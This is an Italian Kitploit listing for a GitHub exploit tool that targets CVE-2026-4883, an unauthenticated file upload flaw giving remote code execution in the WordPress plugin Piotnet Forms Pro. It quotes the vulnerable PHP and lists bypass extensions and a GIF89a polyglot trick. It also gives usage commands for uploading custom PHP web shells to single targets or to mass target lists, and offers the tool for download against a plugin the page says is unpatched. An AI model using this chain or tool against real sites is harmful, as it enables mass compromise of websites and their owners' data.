Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4883 — Piotnet Forms Pro <= 2.1.40 - Caricamento di file arbitrario non autenticato → RCE | Kitploit
Strumenti/GitHubGitHub/xshadow-here/cve-2026-4883
RicognizioneGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubxshadow-here/cve-2026-4883

CVE-2026-4883

Piotnet Forms Pro <= 2.1.40 - Caricamento di file arbitrario non autenticato → RCE

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4883: Piotnet Forms Pro <= 2.1.40 - Caricamento arbitrario di file senza autenticazione → RCE

La vulnerabilità deriva da una validazione inadeguata del tipo di file nella funzione piotnetforms_ajax_form_builder. Il plugin utilizza una blacklist di estensioni incompleta che blocca solo php, phpt, php5, php7 ed exe, mentre permette alternative pericolose come .phtml o .phar.

Dettagli della vulnerabilità

  • Punteggio CVSS: 9.8 (Critico)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Versioni affette: <= 2.1.40
  • Stato della patch: Nessuna patch disponibile
  • Pubblicato: 18 maggio 2026
  • Ricercatori: Shadow & Friska (autori del PoC)

Analisi della causa principale

Il gestore AJAX è registrato senza alcun requisito di autenticazione:

root@kitploit:~
// inc/forms/ajax-form-builder.php:9-10
add_action( 'wp_ajax_piotnetforms_ajax_form_builder', 'piotnetforms_ajax_form_builder' );
add_action( 'wp_ajax_nopriv_piotnetforms_ajax_form_builder', 'piotnetforms_ajax_form_builder' );

La validazione dei file si basa esclusivamente su una blacklist di estensioni incompleta, senza verifica del tipo MIME o dei byte magici:

root@kitploit:~
// inc/forms/ajax-form-builder.php:678-688
$not_allowed_extensions = [ 'php', 'phpt', 'php5', 'php7', 'exe' ];

$file_extension = pathinfo( $file_name_san, PATHINFO_EXTENSION );

if ( in_array( strtolower( $file_extension ), $not_allowed_extensions ) ) {
    wp_die();
}

// .phar, .phtml, .php8, .pht, etc. all pass through freely
move_uploaded_file( $file['tmp_name'][$i], $new_file );

La directory di upload contiene solo un index.html vuoto per prevenire il directory listing — nessun .htaccess per bloccare l'esecuzione PHP. I file caricati sono accessibili pubblicamente all'indirizzo:

root@kitploit:~
/wp-content/uploads/piotnetforms/files/{filename}-{uniqid}.{ext}

L'URL del file può essere recuperato senza autenticazione tramite l'azione AJAX piotnetforms_export_form_submission (anch'essa nopriv), completando la catena completa di RCE senza autenticazione.

Questo è lo stesso bug copia-incolla presente in CVE-2026-4885 — entrambi i plugin condividono codice identico per la gestione vulnerabile degli upload dallo stesso sviluppatore.

Istruzioni per l'uso

Modalità interattiva:

root@kitploit:~
python3 shadow.py

Singolo target:

root@kitploit:~
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shadow.phtml

Scansione di massa:

root@kitploit:~
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shadow.phtml

Opzioni CLI:

  • -u, --url - URL del target
  • -f, --file - File dei target (uno per riga)
  • -s, --shell - Shell PHP personalizzata (GIF89a preposto automaticamente)
  • -t, --threads - Thread concorrenti (default: 5)
  • -h, --help - Visualizza aiuto

Caratteristiche principali

  • Menu interattivo per scansione singola o di massa
  • Ricognizione asincrona parallela
  • Scoperta automatica dei parametri del form dagli input nascosti HTML
  • Byte magici poliglotti GIF89a per tentativi di bypass
  • Perdita di URL tramite piotnetforms_export_form_submission (senza autenticazione)
  • Verifica del caricamento della shell con controlli di esecuzione PHP
  • Risultati salvati in shell.txt
  • Threading configurabile per operazioni di massa

Estensioni bloccate

.php .phpt .php5 .php7 .exe

Estensioni di bypass: .phtml .phar .shtml .php8

Requisiti

root@kitploit:~
pip install httpx

Disclaimer

Lo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. Il test non autorizzato dei sistemi è proibito.

Scarica lo strumento